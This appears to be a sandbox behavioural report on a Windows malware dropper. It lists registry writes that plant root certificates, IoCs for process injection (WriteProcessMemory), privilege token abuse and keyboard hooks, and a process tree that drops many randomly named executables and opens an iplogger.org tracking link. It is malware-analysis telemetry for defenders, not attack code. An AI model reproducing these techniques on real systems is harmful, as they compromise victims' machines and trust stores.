5c0000000100000004000000001000000400000001000000100000001bfe69d191b71933a372a80fe155e5b50300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0b00000001000000100000005300650063007400690067006f0000001d0000000100000010000000885010358d29a38f059b028559c95f901400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd253000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483190000000100000010000000ea6089055218053dd01e37e1d806eedf2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd Weather Installation.exe Set value (data) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = 0300000001000000140000008d4c4a23ba9ee84ea7348fa98cc6e65fbb69de7b140000000100000014000000bbaf7e023dfaa6f13c848eadee3898ecd93232d4040000000100000010000000ab9b109ce8934f11e7cd22ed550680da0f0000000100000030000000a768343c4aeaced5c72f3571938864983a67ed49031c1da2495863caf65fe507011f7f0e70b6cb40e5631c07721be03419000000010000001000000082218ffb91733e64136be5719f57c3a15c0000000100000004000000001000001800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa24b0000000100000044000000420032004600410046003700360039003200460044003900460046004200440036003400450044004500330031003700450034003200330033003400420041005f0000002000000001000000820500003082057e30820466a003020102021067def43ef17bdae24ff5940606d2c084300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a308185310b3009060355040613024742311b30190603550408131247726561746572204d616e636865737465723110300e0603550407130753616c666f7264311a3018060355040a1311434f4d4f444f204341204c696d69746564312b302906035504031322434f4d4f444f205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010091e85492d20a56b1ac0d24ddc5cf446774992b37a37d23700071bc53dfc4fa2a128f4b7f1056bd9f7072b7617fc94b0f17a73de3b00461eeff1197c7f4863e0afa3e5cf993e6347ad9146be79cb385a0827a76af7190d7ecfd0dfa9c6cfadfb082f4147ef9bec4a62f4f7f997fb5fc674372bd0c00d689eb6b2cd3ed8f981c14ab7ee5e36efcd8a8e49224da436b62b855fdeac1bc6cb68bf30e8d9ae49b6c6999f878483045d5ade10d3c4560fc32965127bc67c3ca2eb66bea46c7c720a0b11f65de4808baa44ea9f283463784ebe8cc814843674e722a9b5cbd4c1b288a5c227bb4ab98d9eee05183c309464e6d3e99fa9517da7c3357413c8d51ed0bb65caf2c631adf57c83fbce95dc49baf4599e2a35a24b4baa9563dcf6faaff4958bef0a8fff4b8ade937fbbab8f40b3af9e843421e89d884cb13f1d9bbe18960b88c2856ac141d9c0ae771ebcf0edd3da996a148bd3cf7afb50d224cc01181ec563bf6d3a2e25bb7b204225295809369e88e4c65f191032d707402ea8b671529695202bbd7df506a5546bfa0a328617f70d0c3a2aa2c21aa47ce289c064576bf821827b4d5aeb4cb50e66bf44c867130e9a6df1686e0d8ff40ddfbd042887fa3333a2e5c1e41118163ce18716b2beca68ab7315c3a6a47e0c37959d6201aaff26a98aa72bc574ad24b9dbb10fcb04c41e5ed1d3d5e289d9cccbfb351daa747e584530203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e04160414bbaf7e023dfaa6f13c848eadee3898ecd93232d4300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c050003820101007ff25635b06d954a4e74af3ae26f018b87d33297edf840d2775311d7c7162ec69de64856be80a9f8bc78d2c86317ae8ced1631fa1f18c90ec7ee48799fc7c9b9bccc8815e36861d19f1d4b6181d7560463c2086926f0f0e52fdfc00a2ba905f4025a6a89d7b4844295e3ebf776205e35d9c0cd2508134c71388e87b0338491991e91f1ac9e3fa71d60812c364154a0e246060bac1bc799368c5ea10ba49ed9424624c5c55b81aeada0a0dc9f36b88dc21d15fa88ad8110391f44f02b9fdd10540c0734b136d114fd07023dff7255ab27d62c814171298d41f450571a7e6560afcbc5287698aeb3a853768be621526bea21d0840e494e8853da922ee71d0866d7 Weather Installation.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 GameBoxWin64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 GameBoxWin64.exe -
Script User-Agent 6 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 464 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 468 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 133 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 136 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 262 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 264 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3320 WerFault.exe 3320 WerFault.exe 4964 msedge.exe 4964 msedge.exe 4040 msedge.exe 4040 msedge.exe 3104 WerFault.exe 3104 WerFault.exe 3884 identity_helper.exe 3884 identity_helper.exe 4332 Installation.exe 4332 Installation.exe 4332 Installation.exe 4332 Installation.exe 4332 Installation.exe 4332 Installation.exe 4332 Installation.exe 4332 Installation.exe 4332 Installation.exe 4332 Installation.exe 4332 Installation.exe 4332 Installation.exe 4332 Installation.exe 4332 Installation.exe 4332 Installation.exe 4332 Installation.exe 4332 Installation.exe 4332 Installation.exe 4332 Installation.exe 4332 Installation.exe 4332 Installation.exe 4332 Installation.exe 4332 Installation.exe 4332 Installation.exe 4332 Installation.exe 4332 Installation.exe 6016 E2i_Z1Qek7wHynzKk_G2TtiN.exe 6016 E2i_Z1Qek7wHynzKk_G2TtiN.exe 5824 WerFault.exe 5824 WerFault.exe 4012 WerFault.exe 4012 WerFault.exe 4464 WerFault.exe 4464 WerFault.exe 4388 WerFault.exe 4388 WerFault.exe 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found 3208 Process not Found -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 6016 E2i_Z1Qek7wHynzKk_G2TtiN.exe 7108 hAdmjf27kwz_7TsacCSaTWNP.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4816 KRSetp.exe Token: SeRestorePrivilege 3320 WerFault.exe Token: SeBackupPrivilege 3320 WerFault.exe Token: SeBackupPrivilege 3320 WerFault.exe Token: SeTcbPrivilege 1592 svchost.exe Token: SeTcbPrivilege 1592 svchost.exe Token: SeTcbPrivilege 1592 svchost.exe Token: SeTcbPrivilege 1592 svchost.exe Token: SeTcbPrivilege 1592 svchost.exe Token: SeTcbPrivilege 1592 svchost.exe Token: SeDebugPrivilege 5916 Sxg9ZZxbMH8kA5rom8mY1FbX.exe Token: SeDebugPrivilege 3176 9mjwIGTITPLyL7mQH0BWmdnw.exe Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeDebugPrivilege 6072 g2lVQYLYuJPgPh38AhEEXnAB.exe Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeDebugPrivilege 6036 cmd.exe Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeDebugPrivilege 5036 4vd7wzaSJ6O6_peChFvraIg4.exe Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeDebugPrivilege 4224 ULQYaddSV6Nl0fN2ZjJ2vuRQ.exe Token: SeDebugPrivilege 1928 BsSk35ZHvQtQ6ycRA83qwiKw.exe Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeDebugPrivilege 2836 mdff13DR1phi2sNDJO2fNU5a.exe Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeShutdownPrivilege 3208 Process not Found Token: SeCreatePagefilePrivilege 3208 Process not Found Token: SeCreateTokenPrivilege 5548 32C5.exe Token: SeAssignPrimaryTokenPrivilege 5548 32C5.exe Token: SeLockMemoryPrivilege 5548 32C5.exe Token: SeIncreaseQuotaPrivilege 5548 32C5.exe Token: SeMachineAccountPrivilege 5548 32C5.exe Token: SeTcbPrivilege 5548 32C5.exe Token: SeSecurityPrivilege 5548 32C5.exe Token: SeTakeOwnershipPrivilege 5548 32C5.exe -
Suspicious use of FindShellTrayWindow 7 IoCs
pid Process 4040 msedge.exe 3752 x1r61B6_PO48yubFuSiv5RUD.tmp 2236 Cleaner Installation.exe 2256 Weather Installation.exe 7528 fhvD868tqd9rKMZVwD3ag8Jk.tmp 2596 GameBoxWin64.exe 232 ultramediaburner.tmp -
Suspicious use of SetWindowsHookEx 64 IoCs
pid Process 4332 Installation.exe 5928 4VN6wp3p249Peftj5bgWx74K.exe 5956 fyeOs5QJVz_AdrttNf_bhMfo.exe 6000 lisoce45yJdfxtoDinkLPBB0.exe 5948 IvikQulGbRWAwMsnu_ycAl0V.exe 5972 4L2GsvQzMO7vo0QaK9U3olVx.exe 4584 Msbq7N806vY_kgIRiAQxy9Gp.exe 3168 wuxK2JwKEIjFJEie_od4yOxD.exe 2344 6fCfeRmxTQ7EY00t_cotuQ81.exe 1288 1fp8I1cI5udt6HxCGu4Pot5B.exe 1640 E2i_Z1Qek7wHynzKk_G2TtiN.exe 1896 2YaXYEQpN4D2gejue_SlPHNO.exe 6036 oZ7g_D9oITjP6QBP7YE7EdXv.exe 1196 R_dHTTFWkvGJQgRWc10ATFp3.exe 1540 xcxnFVjqK8FKwg5Qa512Ep3r.exe 4120 customer3.exe 6036 oZ7g_D9oITjP6QBP7YE7EdXv.exe 5552 md8_8eus.exe 4644 x1r61B6_PO48yubFuSiv5RUD.exe 3752 x1r61B6_PO48yubFuSiv5RUD.tmp 4348 jfiag3g_gg.exe 1236 xcxnFVjqK8FKwg5Qa512Ep3r.exe 5648 11111.exe 3988 11111.exe 5544 11111.exe 3688 Setup.exe 4148 jfiag3g_gg.exe 3624 LGCH2-401_2021-08-18_14-40.exe 4868 oA8ksUPGyLC_UzTW6PxDesM6.exe 5600 MediaBurner2.exe 5548 32C5.exe 5836 xtect12.exe 5084 Conhost.exe 5780 zhaoy-game.exe 5336 3h1qGZUEdprlXIwaFgWSdLLy.exe 5592 11111.exe 3712 11111.exe 4564 zhaoy-game.exe 6500 22222.exe 6680 AghY32d_C0IWsfHZSaAte2cz.exe 6744 qER2dJVjQNgUwLeyC0GWXVOg.exe 6756 zzx.exe 6780 RtAumixa8TXlF5V7YdDzWrks.exe 6788 hAdmjf27kwz_7TsacCSaTWNP.exe 6640 22222.exe 6904 gdyzXEj5P496unOqfk6hVDCG.exe 6936 7s2ZdHDbdc7fmGBQwXncfSTe.exe 6820 aoTKQWvv37TQbCovU1Z1MQvL.exe 7152 11111.exe 6192 WE1nYf8UVHZ6KQrxi_PpfIcz.exe 5336 3h1qGZUEdprlXIwaFgWSdLLy.exe 4908 mnF7cBF5FzrUArS0hjJ_P4Vj.exe 6764 eElh3Su0dPZa_3w1fjZFEThC.exe 6928 8vOzvG7hvLT_vK9OBgVL_Ut5.exe 7384 22222.exe 6928 8vOzvG7hvLT_vK9OBgVL_Ut5.exe 7700 22222.exe 6384 fhvD868tqd9rKMZVwD3ag8Jk.exe 7528 fhvD868tqd9rKMZVwD3ag8Jk.tmp 5976 EC26.exe 5876 e4lvj9H2zYe0drqI4t1gMhaB.exe 5048 11111.exe 7620 Setup.exe 7152 11111.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3828 wrote to memory of 4816 3828 EB7233922891E1DAD0434FBD52623647.exe 76 PID 3828 wrote to memory of 4816 3828 EB7233922891E1DAD0434FBD52623647.exe 76 PID 3828 wrote to memory of 4040 3828 EB7233922891E1DAD0434FBD52623647.exe 80 PID 3828 wrote to memory of 4040 3828 EB7233922891E1DAD0434FBD52623647.exe 80 PID 3828 wrote to memory of 5092 3828 EB7233922891E1DAD0434FBD52623647.exe 81 PID 3828 wrote to memory of 5092 3828 EB7233922891E1DAD0434FBD52623647.exe 81 PID 3828 wrote to memory of 5092 3828 EB7233922891E1DAD0434FBD52623647.exe 81 PID 4040 wrote to memory of 3200 4040 msedge.exe 83 PID 4040 wrote to memory of 3200 4040 msedge.exe 83 PID 5092 wrote to memory of 5052 5092 Folder.exe 85 PID 5092 wrote to memory of 5052 5092 Folder.exe 85 PID 5092 wrote to memory of 5052 5092 Folder.exe 85 PID 3828 wrote to memory of 5112 3828 EB7233922891E1DAD0434FBD52623647.exe 87 PID 3828 wrote to memory of 5112 3828 EB7233922891E1DAD0434FBD52623647.exe 87 PID 3828 wrote to memory of 5112 3828 EB7233922891E1DAD0434FBD52623647.exe 87 PID 4564 wrote to memory of 4860 4564 rUNdlL32.eXe 89 PID 4564 wrote to memory of 4860 4564 rUNdlL32.eXe 89 PID 4564 wrote to memory of 4860 4564 rUNdlL32.eXe 89 PID 3188 wrote to memory of 4860 3188 WerFault.exe 89 PID 3188 wrote to memory of 4860 3188 WerFault.exe 89 PID 4040 wrote to memory of 4728 4040 msedge.exe 93 PID 4040 wrote to memory of 4728 4040 msedge.exe 93 PID 4040 wrote to memory of 4728 4040 msedge.exe 93 PID 4040 wrote to memory of 4728 4040 msedge.exe 93 PID 4040 wrote to memory of 4728 4040 msedge.exe 93 PID 4040 wrote to memory of 4728 4040 msedge.exe 93 PID 4040 wrote to memory of 4728 4040 msedge.exe 93 PID 4040 wrote to memory of 4728 4040 msedge.exe 93 PID 4040 wrote to memory of 4728 4040 msedge.exe 93 PID 4040 wrote to memory of 4728 4040 msedge.exe 93 PID 4040 wrote to memory of 4728 4040 msedge.exe 93 PID 4040 wrote to memory of 4728 4040 msedge.exe 93 PID 4040 wrote to memory of 4728 4040 msedge.exe 93 PID 4040 wrote to memory of 4728 4040 msedge.exe 93 PID 4040 wrote to memory of 4728 4040 msedge.exe 93 PID 4040 wrote to memory of 4728 4040 msedge.exe 93 PID 4040 wrote to memory of 4728 4040 msedge.exe 93 PID 4040 wrote to memory of 4728 4040 msedge.exe 93 PID 4040 wrote to memory of 4728 4040 msedge.exe 93 PID 4040 wrote to memory of 4728 4040 msedge.exe 93 PID 4040 wrote to memory of 4728 4040 msedge.exe 93 PID 4040 wrote to memory of 4728 4040 msedge.exe 93 PID 4040 wrote to memory of 4728 4040 msedge.exe 93 PID 4040 wrote to memory of 4728 4040 msedge.exe 93 PID 4040 wrote to memory of 4728 4040 msedge.exe 93 PID 4040 wrote to memory of 4728 4040 msedge.exe 93 PID 4040 wrote to memory of 4728 4040 msedge.exe 93 PID 4040 wrote to memory of 4728 4040 msedge.exe 93 PID 4040 wrote to memory of 4728 4040 msedge.exe 93 PID 4040 wrote to memory of 4728 4040 msedge.exe 93 PID 4040 wrote to memory of 4728 4040 msedge.exe 93 PID 4040 wrote to memory of 4728 4040 msedge.exe 93 PID 4040 wrote to memory of 4728 4040 msedge.exe 93 PID 4040 wrote to memory of 4728 4040 msedge.exe 93 PID 4040 wrote to memory of 4728 4040 msedge.exe 93 PID 4040 wrote to memory of 4728 4040 msedge.exe 93 PID 4040 wrote to memory of 4728 4040 msedge.exe 93 PID 4040 wrote to memory of 4728 4040 msedge.exe 93 PID 4040 wrote to memory of 4728 4040 msedge.exe 93 PID 4040 wrote to memory of 4728 4040 msedge.exe 93 PID 4040 wrote to memory of 4964 4040 msedge.exe 94 PID 4040 wrote to memory of 4964 4040 msedge.exe 94 PID 4040 wrote to memory of 4044 4040 msedge.exe 95 PID 4040 wrote to memory of 4044 4040 msedge.exe 95
Processes
-
C:\Users\Admin\AppData\Local\Temp\EB7233922891E1DAD0434FBD52623647.exe"C:\Users\Admin\AppData\Local\Temp\EB7233922891E1DAD0434FBD52623647.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3828 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\KRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\KRSetp.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4816
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/19Pfw72⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4040 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7fffd8a646f8,0x7fffd8a64708,0x7fffd8a647183⤵PID:3200
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:23⤵PID:4728
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
PID:4964
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2668 /prefetch:83⤵PID:4044
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:13⤵PID:3612
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3632 /prefetch:13⤵PID:4528
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5176 /prefetch:83⤵PID:5048
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5176 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:3884
-
-
